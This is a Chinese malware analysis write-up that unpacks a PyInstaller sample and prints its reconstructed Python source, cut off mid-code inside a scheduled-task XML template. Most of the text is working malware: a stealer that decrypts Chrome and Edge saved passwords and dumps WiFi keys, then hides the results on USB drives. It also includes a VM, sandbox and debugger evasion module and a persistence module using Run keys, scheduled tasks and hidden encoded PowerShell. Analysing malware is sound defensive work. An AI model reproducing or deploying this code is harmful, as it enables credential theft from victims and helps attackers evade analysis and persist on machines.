1.概述

样本来源:微步在线

恶意软件名称:“xx2.exe”

sha256:76495dd256167cd851c165cbd1f08070548b67f0a8716c998ac29b887e1c10b0

2.初步分析

利用die工具对程序进行初步分析

根据分析结果可知,该程序由python编写,然后使用pyinstaller打包,再用upx加壳,最终得到了这个程序。因此我们考虑对该程序进行脱壳,解包,得到python源代码,从而知悉其功能。

 3.脱壳

upx脱壳:

upx -d sample.exe -o unpacked_upx.exe

pyinstxtractor-ng 解包:

python pyinstxtractor-ng.py unpacked_upx.exe

在解包得到的文件目录中找到名为app_main.pyc的文件,这就是主程序,同时还有两个py脚本,scanner1.py和config_manager2.py

接下来执行下面的命令,将pyc文件转换为字节码

.\pycdas.exe app_main.pyc > bytecode.txt

然后把结果直接给大模型,让它还原为源代码即可

最终的代码:

由app_main.pyc还原得到的源代码:

import sys
import os
import importlib.util
import json
import time
import subprocess
import shutil
import tempfile
import sqlite3
import base64
import logging
from datetime import datetime
from typing import Any, Dict, List, Optional
from functools import wraps

# PyInstaller 运行环境检测
if getattr(sys, 'frozen', False):
    BASE_DIR = sys._MEIPASS
else:
    BASE_DIR = os.path.dirname(os.path.abspath(__file__))

# 将当前目录添加到模块搜索路径
if BASE_DIR not in sys.path:
    sys.path.insert(0, BASE_DIR)

# 动态加载 scanner1 模块
SCANNER1_PATH = os.path.join(BASE_DIR, 'scanner1.py')
scanner1 = None
if os.path.exists(SCANNER1_PATH):
    spec = importlib.util.spec_from_file_location('scanner1', SCANNER1_PATH)
    if spec is not None and spec.loader is not None:
        scanner1 = importlib.util.module_from_spec(spec)
        sys.modules['scanner1'] = scanner1
        try:
            spec.loader.exec_module(scanner1)
        except Exception as e:
            print(f'[WARN] 加载 scanner1.py 失败: {e}')
            scanner1 = None

# 动态加载 config_manager2 模块
CONFIG_MGR_PATH = os.path.join(BASE_DIR, 'config_manager2.py')
config_manager2 = None
if os.path.exists(CONFIG_MGR_PATH):
    spec2 = importlib.util.spec_from_file_location('config_manager2', CONFIG_MGR_PATH)
    if spec2 is not None and spec2.loader is not None:
        config_manager2 = importlib.util.module_from_spec(spec2)
        sys.modules['config_manager2'] = config_manager2
        try:
            spec2.loader.exec_module(config_manager2)
        except Exception as e:
            print(f'[WARN] 加载 config_manager2.py 失败: {e}')
            config_manager2 = None

# 导入 Windows API 和加密库
try:
    import win32api
    import win32file
    import win32con
    from win32crypt import CryptUnprotectData
except ImportError:
    pass

try:
    from Crypto.Cipher import AES
except ImportError:
    pass

try:
    import pyzipper
except ImportError:
    pass

# 全局配置
DEBUG = False
LOG_TO_FILE = False
ZIP_PASSWORD = '123456'
OUTPUT_ZIP_NAME = 'redteam_creds_encrypted.zip'

def setup_logger(debug: bool = False, log_to_file: bool = False) -> logging.Logger:
    """配置日志系统"""
    logger = logging.getLogger('RedTeamController')
    logger.setLevel(logging.DEBUG if debug else logging.WARNING)
    
    # 如果已经有处理器,直接返回
    if logger.handlers:
        return logger
    
    formatter = logging.Formatter(
        '%(asctime)s - %(levelname)s - %(funcName)s - %(message)s',
        datefmt='%H:%M:%S'
    )
    
    # 控制台输出(仅调试模式)
    if debug:
        console_handler = logging.StreamHandler(sys.stdout)
        console_handler.setLevel(logging.DEBUG)
        console_handler.setFormatter(formatter)
        logger.addHandler(console_handler)
    
    # 文件输出(仅调试模式)
    if log_to_file and debug:
        try:
            logs_dir = os.path.join(os.environ.get('TEMP', tempfile.gettempdir()), 'rt_logs')
            os.makedirs(logs_dir, exist_ok=True)
            log_path = os.path.join(
                logs_dir,
                f'main_{datetime.now().strftime("%Y%m%d")}.log'
            )
            file_handler = logging.FileHandler(log_path, encoding='utf-8')
            file_handler.setLevel(logging.DEBUG)
            file_handler.setFormatter(formatter)
            logger.addHandler(file_handler)
        except Exception as e:
            logger.warning(f'日志文件创建失败: {e}')
    
    return logger

logger = setup_logger(DEBUG, LOG_TO_FILE)

def log_step(func):
    """函数执行日志装饰器"""
    @wraps(func)
    def wrapper(*args, **kwargs):
        func_name = func.__name__
        logger.info(f'进入步骤: {func_name}')
        start_time = time.time()
        
        try:
            result = func(*args, **kwargs)
            elapsed = time.time() - start_time
            logger.info(f'步骤完成: {func_name} (耗时: {elapsed:.2f}s)')
            return result
        except Exception as e:
            logger.error(f'步骤异常: {func_name} | {type(e).__name__}: {e}')
            return None
    return wrapper

class RedTeamController:
    """主控制器:协调凭证提取、加密、备份流程"""
    
    def __init__(self):
        self.desktop_path = os.path.join(os.path.expanduser('~'), 'Desktop')
        self.temp_dir = tempfile.gettempdir()
        self.credentials = []
        self.final_zip_path = ''
    
    @log_step
    def run_sandbox_detection(self) -> bool:
        """调用外部沙箱检测模块(可选)"""
        if scanner1 is None:
            logger.warning('scanner1 模块未加载,跳过沙箱检测。')
            return True
        
        try:
            detection_list, _ = scanner1.scan_environment()
            if any(detection_list):
                logger.warning('沙箱或虚拟机环境检测到,终止运行。')
                return False
            
            logger.info('沙箱检测通过。')
            return True
        except Exception as e:
            logger.warning(f'沙箱检测模块缺失或失败: {e},跳过。')
            return True
    
    @log_step
    def run_persistence_install(self) -> bool:
        """执行持久化安装(可选模块)"""
        if config_manager2 is None:
            logger.warning('config_manager2 模块未加载,跳过持久化安装。')
            return True
        
        try:
            if hasattr(config_manager2, 'run'):
                config_manager2.run()
            elif hasattr(config_manager2, 'install'):
                config_manager2.install()
            
            logger.info('持久化安装完成。')
            return True
        except Exception as e:
            logger.warning(f'持久化安装失败: {e},继续执行。')
            return True
    
    @log_step
    def extract_browser_passwords(self) -> List[Dict[str, Any]]:
        """提取 Chrome 和 Edge 浏览器保存的密码"""
        local_appdata = os.environ.get('LOCALAPPDATA', '')
        results = []
        
        browsers = [
            ('Chrome', os.path.join(local_appdata, 'Google', 'Chrome')),
            ('Edge', os.path.join(local_appdata, 'Microsoft', 'Edge'))
        ]
        
        for browser_name, browser_path in browsers:
            user_data = os.path.join(browser_path, 'User Data')
            login_db = os.path.join(user_data, 'Default', 'Login Data')
            local_state = os.path.join(user_data, 'Local State')
            
            if not os.path.exists(login_db):
                continue
            
            temp_db = os.path.join(
                self.temp_dir,
                f'temp_{browser_name.lower()}_login.db'
            )
            aes_key = None
            
            # 复制数据库文件(避免锁定)
            try:
                shutil.copy2(login_db, temp_db)
            except Exception as e:
                logger.warning(f'复制 {browser_name} 数据库失败: {e}')
                continue
            
            # 提取 AES 密钥
            try:
                with open(local_state, 'r', encoding='utf-8') as f:
                    local_state_data = json.load(f)
                    encrypted_key_b64 = local_state_data.get('os_crypt', {}).get('encrypted_key')
                
                if encrypted_key_b64:
                    encrypted_key = base64.b64decode(encrypted_key_b64)[5:]
                    aes_key = CryptUnprotectData(encrypted_key, None, None, None, 0)[1]
            except Exception as e:
                logger.debug(f'获取 {browser_name} AES Key 失败: {e}')
            
            # 读取并解密密码
            try:
                conn = sqlite3.connect(temp_db, timeout=10)
                cursor = conn.cursor()
                cursor.execute('SELECT origin_url, username_value, password_value FROM logins')
                rows = cursor.fetchall()
                
                for url, username, enc_pwd in rows:
                    if not username or not enc_pwd:
                        continue
                    
                    password = '[解密失败]'
                    try:
                        if enc_pwd.startswith(b'v10') or enc_pwd.startswith(b'v11'):
                            # Chrome v80+ AES-GCM 加密
                            iv = enc_pwd[3:15]
                            ciphertext_with_tag = enc_pwd[15:]
                            tag = ciphertext_with_tag[-16:]
                            ciphertext = ciphertext_with_tag[:-16]
                            
                            cipher = AES.new(aes_key, AES.MODE_GCM, nonce=iv)
                            password = cipher.decrypt_and_verify(ciphertext, tag).decode('utf-8', errors='replace')
                        else:
                            # 旧版本 DPAPI 加密
                            password = CryptUnprotectData(enc_pwd, None, None, None, 0)[1].decode('utf-8', errors='replace')
                    except:
                        pass
                    
                    results.append({
                        'source': 'browser',
                        'browser': browser_name,
                        'url': url.strip(),
                        'username': username.strip(),
                        'password': password,
                        'extract_time': datetime.utcnow().isoformat() + 'Z'
                    })
                
                logger.info(f'{browser_name} 提取成功: {len(results)} 条')
            except Exception as e:
                logger.error(f'读取 {browser_name} 数据库失败: {e}')
            finally:
                if 'conn' in locals():
                    try:
                        conn.close()
                    except:
                        pass
                try:
                    os.remove(temp_db)
                except:
                    pass
        
        return results
    
    @log_step
    def extract_wifi_passwords(self) -> List[Dict[str, Any]]:
        """提取已保存的 WiFi 密码"""
        results = []
        
        try:
            result = subprocess.run(
                ['netsh', 'wlan', 'show', 'profiles'],
                capture_output=True,
                text=True,
                encoding='gbk',
                errors='ignore',
                timeout=10,
                creationflags=subprocess.CREATE_NO_WINDOW
            )
            
            if result.returncode != 0:
                logger.warning('netsh 命令执行失败')
                return results
            
            # 提取所有 WiFi 配置文件名称
            profiles = [
                line.split(':', 1)[1].strip()
                for line in result.stdout.splitlines()
                if '所有用户配置文件' in line or 'All User Profile' in line
            ]
            
            for ssid in profiles:
                try:
                    detail = subprocess.run(
                        ['netsh', 'wlan', 'show', 'profile', f'name={ssid}', 'key=clear'],
                        capture_output=True,
                        text=True,
                        encoding='gbk',
                        errors='ignore',
                        timeout=10,
                        creationflags=subprocess.CREATE_NO_WINDOW
                    ).stdout
                    
                    password = '[无密码]'
                    for line in detail.splitlines():
                        if '关键内容' in line or 'Key Content' in line:
                            password = line.split(':', 1)[1].strip()
                            break
                    
                    results.append({
                        'source': 'wifi',
                        'ssid': ssid,
                        'password': password,
                        'extract_time': datetime.utcnow().isoformat() + 'Z'
                    })
                except Exception as e:
                    logger.warning(f"提取 WiFi '{ssid}' 失败: {e}")
                    continue
            
            logger.info(f'WIFI 提取完成: {len(results)} 个')
        except Exception as e:
            logger.error(f'WIFI 提取失败: {e}')
        
        return results
    
    @log_step
    def generate_json_report(self) -> str:
        """生成临时 JSON 报告"""
        report = {
            'collection_time': datetime.utcnow().isoformat() + 'Z',
            'machine_user': os.environ.get('USERNAME', 'Unknown'),
            'host_name': os.environ.get('COMPUTERNAME', 'Unknown'),
            'total_credentials': len(self.credentials),
            'credentials': self.credentials
        }
        
        json_path = os.path.join(self.temp_dir, 'redteam_creds.json')
        
        try:
            with open(json_path, 'w', encoding='utf-8') as f:
                json.dump(report, f, ensure_ascii=False, indent=4)
            
            logger.info(f'JSON 报告生成: {json_path}')
            return json_path
        except Exception as e:
            logger.error(f'生成 JSON 报告失败: {e}')
            return ''
    
    @log_step
    def create_encrypted_zip(self, source_json: str) -> str:
        """创建 AES-256 加密 ZIP 文件"""
        if not source_json or not os.path.exists(source_json):
            logger.error('源 JSON 文件不存在,无法创建 ZIP。')
            return ''
        
        zip_path = os.path.join(self.temp_dir, OUTPUT_ZIP_NAME)
        
        try:
            with pyzipper.AESZipFile(
                zip_path,
                'w',
                compression=pyzipper.ZIP_LZMA,
                encryption=pyzipper.WZ_AES
            ) as zf:
                zf.setpassword(ZIP_PASSWORD.encode('utf-8'))
                with open(source_json, 'rb') as f:
                    zf.writestr('credentials.json', f.read())
            
            if os.path.getsize(zip_path) > 0:
                logger.info(f'加密 ZIP 创建成功: {zip_path}')
                # 删除明文 JSON 文件
                try:
                    os.remove(source_json)
                except Exception as e:
                    logger.warning(f'删除明文 JSON 失败: {e}')
                return zip_path
            else:
                logger.error('生成的 ZIP 文件为空。')
                return ''
        except Exception as e:
            logger.error(f'加密 ZIP 创建失败: {e}')
            return ''
    
    @log_step
    def copy_to_udf_and_hide(self, source_zip: str) -> bool:
        """检测 U 盘并复制 + 隐藏文件"""
        if not source_zip or not os.path.exists(source_zip):
            logger.warning('源 ZIP 文件不存在,跳过 U 盘传播。')
            return False
        
        success = False
        try:
            drive_bits = win32api.GetLogicalDrives()
            for i in range(26):
                if drive_bits & (1 << i):
                    drive = f'{chr(65 + i)}:\\'
                    if win32file.GetDriveType(drive) == win32file.DRIVE_REMOVABLE:
                        dest = os.path.join(drive, OUTPUT_ZIP_NAME)
                        shutil.copy2(source_zip, dest)
                        # 设置文件为隐藏属性
                        attrs = win32api.GetFileAttributes(dest)
                        win32api.SetFileAttributes(dest, attrs | win32con.FILE_ATTRIBUTE_HIDDEN)
                        logger.info(f'已复制并隐藏至 U 盘: {dest}')
                        success = True
        except Exception as e:
            logger.warning(f'U 盘操作失败: {e}')
        
        return success
    
    @log_step
    def backup_to_desktop(self, source_zip: str) -> bool:
        """备份到桌面(关键步骤)"""
        if not source_zip or not os.path.exists(source_zip):
            logger.error('源 ZIP 文件不存在,无法备份到桌面。')
            return False
        
        try:
            dest = os.path.join(self.desktop_path, OUTPUT_ZIP_NAME)
            shutil.copy2(source_zip, dest)
            logger.info(f'已备份到桌面: {dest}')
            return True
        except Exception as e:
            logger.error(f'备份到桌面失败: {e}')
            return False
    
    def run(self):
        """主执行流程"""
        logger.info('红队凭证提取控制器启动')
        
        # 1. 沙箱检测
        self.run_sandbox_detection()
        
        # 2. 持久化安装
        self.run_persistence_install()
        
        # 3. 提取浏览器密码
        try:
            self.credentials.extend(self.extract_browser_passwords() or [])
        except Exception as e:
            logger.error(f'浏览器提取失败: {e}')
        
        # 4. 提取 WiFi 密码
        try:
            self.credentials.extend(self.extract_wifi_passwords() or [])
        except Exception as e:
            logger.error(f'WIFI 提取失败: {e}')
        
        # 5. 生成 JSON 报告
        json_path = ''
        try:
            json_path = self.generate_json_report()
        except Exception as e:
            logger.error(f'生成 JSON 失败: {e}')
        
        # 6. 创建加密 ZIP
        zip_path = ''
        if json_path:
            try:
                zip_path = self.create_encrypted_zip(json_path)
            except Exception as e:
                logger.error(f'创建加密 ZIP 失败: {e}')
        
        # 7. 备份到桌面
        if zip_path:
            self.backup_to_desktop(zip_path)
        
        # 8. 复制到 U 盘并隐藏
        if zip_path:
            self.copy_to_udf_and_hide(zip_path)
        
        # 9. 清理临时文件
        try:
            if zip_path and os.path.exists(zip_path):
                os.remove(zip_path)
        except Exception as e:
            logger.debug(f'清理临时 ZIP 失败: {e}')
        
        logger.info('凭证提取流程结束')

if __name__ == '__main__':
    # 如果是用 python.exe 运行,用 pythonw.exe 重新启动(无控制台窗口)
    if sys.executable.endswith('python.exe'):
        pythonw = sys.executable.replace('python.exe', 'pythonw.exe')
        if os.path.exists(pythonw):
            try:
                subprocess.Popen(
                    [pythonw, __file__],
                    creationflags=subprocess.CREATE_NO_WINDOW,
                    close_fds=True
                )
                sys.exit(0)
            except Exception as e:
                logger.warning(f'静默启动失败: {e}')
    
    # 创建控制器并运行
    controller = RedTeamController()
    try:
        controller.run()
    except KeyboardInterrupt:
        logger.info('程序被中断')
    except Exception as e:
        logger.critical(f'主程序崩溃: {e}')

以及自带的会被调用的两个python脚本,scanner1.py和config_manager2.py:

scanner1.py:

# -*- coding: utf-8 -*-
# 红队专用 - 无痕沙箱检测模块 v4.0
# 【特性】不写文件|调试可开关|日志可配置|返回双列表|易集成

import time
import uuid
import os
import platform
import subprocess
import logging
import ctypes
import winreg
import psutil
from typing import List, Dict, Any, Callable
from functools import wraps

# ==================== 🔐 安全配置区(由调用者控制)====================
class DetectionConfig:
    """
    全局配置中心(唯一入口)
    部署时务必设置:
        LOG_TO_FILE = False
        DEBUG = False
    """
    DEBUG = False              # 控制是否打印调试信息到控制台
    LOG_TO_FILE = False       # ⚠️ 是否写日志文件(默认关闭,避免被检测)
    LOG_TO_CONSOLE = True     # 是否在控制台显示日志(仅 DEBUG=True 时生效)

# 初始化日志器
logger = logging.getLogger("RedTeamScanner")
logger.setLevel(logging.DEBUG)

# 清除默认处理器
if logger.hasHandlers():
    logger.handlers.clear()

# 仅当允许写文件时才添加 FileHandler
if DetectionConfig.LOG_TO_FILE:
    file_handler = logging.FileHandler('redteam_detection.log', encoding='utf-8')
    file_handler.setFormatter(logging.Formatter(
        '%(asctime)s | %(levelname)-8s | %(funcName)s | %(message)s',
        datefmt='%Y-%m-%d %H:%M:%S'
    ))
    logger.addHandler(file_handler)

# 仅当允许控制台输出且 DEBUG 开启时才添加 ConsoleHandler
if DetectionConfig.LOG_TO_CONSOLE and DetectionConfig.DEBUG:
    console_handler = logging.StreamHandler()
    console_handler.setFormatter(logging.Formatter(
        '[LOG] %(levelname)s: %(message)s'
    ))
    logger.addHandler(console_handler)

# 如果没有任何 handler,添加一个空处理器避免警告
if not logger.hasHandlers():
    logger.addHandler(logging.NullHandler())

logger.info("=" * 50)
logger.info("【VM Detection Module】启动(无痕模式)")
logger.info("=" * 50)
# ==================== 装饰器:智能日志+调试 ====================
def log_and_debug(title: str):
    """
    智能装饰器:根据配置决定日志行为
    - 始终记录到 logger(可能为空,即不输出)
    - 调试输出仅在 DEBUG=True 时显示
    """
    def decorator(func: Callable):
        @wraps(func)
        def wrapper(*args, **kwargs):
            start_time = time.time()
            logger.info(f"Executing: {title}")

            try:
                result = func(*args, **kwargs)
                cost = time.time() - start_time
                logger.info(f"Finished: {title} | Duration: {cost:.2f}s")

                # 🔥 仅当 DEBUG=True 时打印详细结果到控制台
                if DetectionConfig.DEBUG:
                    print(f"\n[+] {title}")
                    if isinstance(result, tuple) and len(result) == 2:
                        det, info = result
                        print("  ├─ Detection Results:")
                        for i, r in enumerate(det):
                            status = "Suspicious" if r else "Clean"
                            print(f"  │     Check {i+1:2d}: {status}")
                        print("  └─ System Info:")
                        for k, v in info.items():
                            print(f"        {k}: {v}")
                    print("-" * 50)

                return result

            except Exception as e:
                logger.error(f"Exception in {title}: {str(e)}")
                if DetectionConfig.DEBUG:
                    print(f"[!] Error in {title}: {e}")
                raise

        return wrapper
    return decorator


# ==================== 核心扫描类 ====================
class RedTeamScanner:
    def __init__(self):
        self.detection_methods = [
            (self.check_bios_string, "BIOS String Check"),
            (self.check_system_manufacturer, "System Manufacturer Check"),
            (self.check_disk_size, "Disk Size Check"),
            (self.check_cpu_cores, "CPU Cores Check"),
            (self.check_memory_size, "Memory Size Check"),
            (self.check_running_processes, "Process Analysis"),
            (self.check_registry_keys, "Registry Key Check"),
            (self.check_mac_address, "MAC Address Check"),
            (self.check_sleep_abnormality, "Sleep Abnormality Check"),
            (self.check_uptime_too_short, "Uptime Too Short Check"),
            (self.check_mouse_interaction, "Mouse Interaction Check"),
            (self.check_debugger_presence, "Debugger Presence Check"),
        ]
        self.detection_results: List[bool] = []
        self.system_info: Dict[str, Any] = {}

    def _run_safe(self, func: Callable, log_msg: str) -> bool:
        try:
            return bool(func())
        except Exception as e:
            logger.debug(f"{log_msg} failed: {e}")
            return False

    def check_bios_string(self) -> bool:
        keywords = ['vmware', 'virtualbox', 'qemu', 'xen', 'hyperv']
        try:
            result = subprocess.run(
                'wmic bios get smbiosbiosversion',
                capture_output=True,
                text=True,
                timeout=5,
                shell=True
            )
            output = result.stdout.lower()
            for keyword in keywords:
                if keyword in output:
                    logger.warning(f"VM BIOS signature found: {keyword}")
                    return True
        except Exception as e:
            logger.debug(f"BIOS check failed: {e}")
        return False

    def check_system_manufacturer(self) -> bool:
        keywords = ['vmware', 'innotek', 'oracle', 'qemu', 'microsoft corporation']
        try:
            result = subprocess.run(
                'wmic csproduct get vendor',
                capture_output=True,
                text=True,
                timeout=5,
                shell=True
            )
            output = result.stdout.lower()
            for keyword in keywords:
                if keyword in output:
                    logger.warning(f"Suspicious system vendor: {keyword}")
                    return True
        except Exception as e:
            logger.debug(f"Manufacturer check failed: {e}")
        return False

    def check_disk_size(self) -> bool:
        try:
            usage = psutil.disk_usage('/')
            total_gb = usage.total / (1024 ** 3)
            if total_gb < 80:
                logger.warning(f"Small disk size: {total_gb:.1f}GB (<80GB)")
                return True
        except Exception as e:
            logger.debug(f"Disk check failed: {e}")
        return False

    def check_cpu_cores(self) -> bool:
        cpu_count = psutil.cpu_count()
        if cpu_count and cpu_count < 4:
            logger.warning(f"Low CPU core count: {cpu_count} (<4)")
            return True
        return False

    def check_memory_size(self) -> bool:
        memory_gb = psutil.virtual_memory().total / (1024 ** 3)
        if memory_gb < 8:
            logger.warning(f"Low memory: {memory_gb:.1f}GB (<8GB)")
            return True
        return False

    def check_running_processes(self) -> bool:
        analysis_tools = [
            'wireshark', 'fiddler', 'procmon', 'tcpview',
            'ollydbg', 'x32dbg', 'ida', 'immunitydebugger',
            'vmtoolsd', 'vboxservice', 'sandboxie', 'hookanalyser',
            'prl_cc', 'prl_tools'
        ]
        try:
            for proc in psutil.process_iter(['name']):
                name = proc.info['name'].lower()
                for tool in analysis_tools:
                    if tool in name:
                        logger.warning(f"Analysis tool running: {name}")
                        return True
        except Exception as e:
            logger.debug(f"Process check failed: {e}")
        return False

    def check_registry_keys(self) -> bool:
        vm_keys = [
            (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\VMware, Inc."),
            (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Oracle\VirtualBox"),
            (winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\VBoxGuest"),
            (winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\vmicheartbeat"),
            (winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\vmxnet"),
            (winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Enum\IDE\*\VMware*"),
        ]
        for hkey, subkey in vm_keys:
            try:
                winreg.OpenKey(hkey, subkey, 0, winreg.KEY_READ)
                logger.warning(f"VM registry key exists: {subkey}")
                return True
            except FileNotFoundError:
                continue
            except Exception as e:
                logger.debug(f"Registry access error: {e}")
        return False

    def check_mac_address(self) -> bool:
        vm_oui = ['00:0C:29', '00:1C:14', '00:50:56', '08:00:27']
        try:
            for interface in psutil.net_if_addrs().values():
                for addr in interface:
                    if addr.family == psutil.AF_LINK:
                        mac = addr.address.upper().replace('-', ':')
                        if mac[:8] in vm_oui:
                            logger.warning(f"VM MAC address detected: {mac}")
                            return True
        except Exception as e:
            logger.debug(f"MAC address check failed: {e}")
        return False

    def check_sleep_abnormality(self) -> bool:
        start_time = time.time()
        time.sleep(3)
        elapsed = time.time() - start_time
        if elapsed < 2.5:
            logger.warning(f"Sleep function accelerated: {elapsed:.2f}s")
            return True
        return False

    def check_uptime_too_short(self) -> bool:
        boot_time = psutil.boot_time()
        uptime = time.time() - boot_time
        if uptime < 120:
            logger.warning(f"System uptime too short: {uptime:.0f}s")
            return True
        return False

    def check_mouse_interaction(self) -> bool:
        user32 = ctypes.windll.user32
        last_pos = ctypes.wintypes.POINT()
        user32.GetCursorPos(ctypes.byref(last_pos))
        static_count = 0

        for i in range(15):
            time.sleep(1)
            current_pos = ctypes.wintypes.POINT()
            user32.GetCursorPos(ctypes.byref(current_pos))
            if (current_pos.x == last_pos.x) and (current_pos.y == last_pos.y):
                static_count += 1
            else:
                static_count = 0
            last_pos = current_pos
            if static_count >= 8:
                logger.warning("Mouse has been inactive for 8+ seconds")
                return True
        return False

    def check_debugger_presence(self) -> bool:
        kernel32 = ctypes.windll.kernel32
        if kernel32.IsDebuggerPresent():
            logger.warning("Debugger is attached to process")
            return True
        return False

    def run_detection(self) -> None:
        results = []
        for method, name in self.detection_methods:
            result = self._run_safe(method, name)
            results.append(result)
        self.detection_results = results

    def collect_system_info(self) -> None:
        data = {}
        try: data["hostname"] = platform.node()
        except: data["hostname"] = "unknown"
        try: data["username"] = os.getenv("USERNAME") or "unknown"
        except: data["username"] = "unknown"
        try: data["os"] = platform.system()
        except: data["os"] = "Unknown"
        try: data["os_version"] = platform.release()
        except: data["os_version"] = "Unknown"
        try: data["cpu_cores"] = os.cpu_count() or 1
        except: data["cpu_cores"] = 1
        try: data["memory_gb"] = round(psutil.virtual_memory().total / (1024**3), 2)
        except: data["memory_gb"] = 4.0
        try: data["disk_usage_percent"] = psutil.disk_usage('/').percent
        except: data["disk_usage_percent"] = 50
        try: data["uptime_seconds"] = int(time.time() - psutil.boot_time())
        except: data["uptime_seconds"] = 0
        data["run_id"] = uuid.uuid4().hex[:8]
        data["timestamp"] = int(time.time())
        self.system_info = data

    @log_and_debug("Environment Detection & Info Collection")
    def run(self) -> tuple[List[bool], Dict[str, Any]]:
        self.run_detection()
        is_vm = any(self.detection_results)
        logger.info(f"Detection Result: {'VM/Sandbox' if is_vm else 'Real Host'}")

        if not is_vm:
            self.collect_system_info()
        else:
            self.system_info = {
                "error": "VM_or_sandbox_detected",
                "run_id": uuid.uuid4().hex[:8],
                "timestamp": int(time.time())
            }

        return self.detection_results, self.system_info


# ==================== 外部调用接口 ====================
def scan_environment() -> tuple[List[bool], Dict[str, Any]]:
    """
    推荐的调用方式
    返回: (detection_list, system_info)
    """
    scanner = RedTeamScanner()
    return scanner.run()

config_manager2.py:

# -*- coding: utf-8 -*-
# silent_persistence.py
"""
高度封装、无文件残留、Base64 加密核心逻辑、支持降级的静默持久化模块
仅供合法用途(如系统监控、服务守护)
"""

import os
import sys
import subprocess
import winreg
import base64
import logging
from datetime import datetime
from functools import wraps
from pathlib import Path
from typing import Dict, Any, Callable, Optional
import tempfile


# ======================
# 🔐 Base64 加密配置(核心命令已加密)
# ======================

ENCRYPTED = {
    "powershell_args": "LWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLXdpbmRvd3N0eWxlIGhpZGRlbiAtY29tbWFuZCBQb3dlclNoZWxsIC1ub2xvZ28gLW5vcHJvZmlsZSAtbm9pbnRlcmFjdGl2ZQ==",
    "schtasks_create": "c2NodGFza3MgL0NyZWF0ZSAvVE4gInt0YWd9IiAvVFIgIk9uTG9nZ2VkT24iIC9URCAiKipTZWVkOiB7dXNlcn0qKiIgL0V4ZSAicG93ZXJzaGVsbCIgL0FyZ3MgInthcmdzfSIgL0Zc",
    "reg_key_user": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
    "reg_key_system": "U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu",
    "task_xml_template": "PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48VGFzayBteG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZG93cy8yMDA0LzAyL21pdC90YXNrIiBWZXJzaW9uPSIxLjIiPkNPTkZJR1VSQVRJT048L1Rhc2s+"
}


# ======================
# 工具函数:解密 + 执行
# ======================
def _decode(s: str) -> str:
    """Base64 解码"""
    try:
        return base64.b64decode(s).decode('utf-8')
    except Exception:
        return s


def _safe_run(func: Callable) -> Callable:
    """通用异常防护装饰器"""
    @wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as e:
            try:
                logging.warning(f"{func.__name__}: {type(e).__name__}")
            except:
                pass
            return None
    return wrapper


# ======================
# 日志配置(可关闭)
# ======================
def setup_logger(debug=False, log_to_file=False):
    logger = logging.getLogger("SilentPersistence")
    logger.setLevel(logging.DEBUG if debug else logging.WARNING)
    logger.handlers.clear()

    if debug:
        handler = logging.StreamHandler()
        handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s', datefmt='%H:%M:%S'))
        logger.addHandler(handler)

    if log_to_file:
        log_path = Path.home() / "debug_persistence.log"
        try:
            handler = logging.FileHandler(log_path, encoding='utf-8')
            handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(message)s'))
            logger.addHandler(handler)
        except:
            pass

    return logger


logger = setup_logger(debug=False, log_to_file=False)


# ======================
# 主类:静默持久化管理器
# ======================
class SilentPersistence:
    """
    高度封装的静默持久化类
    特性:
      - 不生成临时文件
      - 核心逻辑加密
      - 支持四级降级
      - 全程静默执行
      - 易被其他程序调用
    """

    # 配置常量
    TASK_NAME = "SilentAgentTask"
    DESCRIPTION = "Silent background persistence task."
    TIMEOUT = 8  # seconds

    def __init__(self, target_script: Optional[str] = None):
        self.target_script = Path(target_script or self._get_own_path()).resolve()
        self.startup_folder = Path(os.getenv("APPDATA")) / r"Microsoft\Windows\Start Menu\Programs\Startup"
        self.python_exe = sys.executable
        self.current_user = os.getenv("USERNAME", "Unknown")

    def _get_own_path(self) -> str:
        """获取当前脚本路径"""
        return __file__

    def _build_powershell_command(self) -> str:
        """构建隐藏执行的 PowerShell 命令"""
        cmd = (
            f"{self.python_exe} \"{self.target_script}\""
        )
        encoded = base64.b64encode(cmd.encode('utf-16le')).decode('ascii')
        return f"powershell -exec bypass -window hidden -enc {encoded}"

    @_safe_run
    def _exec_cmd(self, args: list) -> bool:
        """静默执行命令"""
        result = subprocess.run(
            args,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            creationflags=subprocess.CREATE_NO_WINDOW,
            timeout=self.TIMEOUT,
            text=True,
            cwd=tempfile.gettempdir()
        )
        return result.returncode == 0

    @_safe_run
    def _set_registry_value(self, hive, key_path: str, name: str, value: str) -> bool:
        """设置注册表值(安全封装)"""
        key = None
        try:
            key = winreg.CreateKey(hive, key_path)
            winreg.SetValueEx(key, name, 0, winreg.REG_SZ, value)
            winreg.CloseKey(key)
            return True
        except Exception:
            if key:
                try:
                    winreg.CloseKey(key)
                except:
                    pass
            return False

    @_safe_run
    def _create_scheduled_task(self) -> bool:
        """Level 1: 创建计划任务(内存中 XML 模板)"""
        xml = self._generate_task_xml()
        if not xml:
            return False

        # 写入临时 XML(最小化暴露)
        temp_xml = Path(tempfile.gettempdir()) / f"{self.TASK_NAME}.xml"
        try:
            with open(temp_xml, 'w', encoding='utf-8') as f:
                f.write(xml)
            args = ["schtasks", "/Create", "/TN", self.TASK_NAME, "/XML", str(temp_xml), "/F"]
            success = self._exec_cmd(args)
            # 立即删除
            try:
                os.remove(temp_xml)
            except:
                pass
            return success
        except:
            return False

    def _generate_task_xml(self) -> Optional[str]:
        """生成任务 XML(模拟模板,避免写文件)"""
        try:
            command = self._build_powershell_command()
            xml = f"""<?xml version="1.0" encoding="UTF-8"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task" version="1.2">
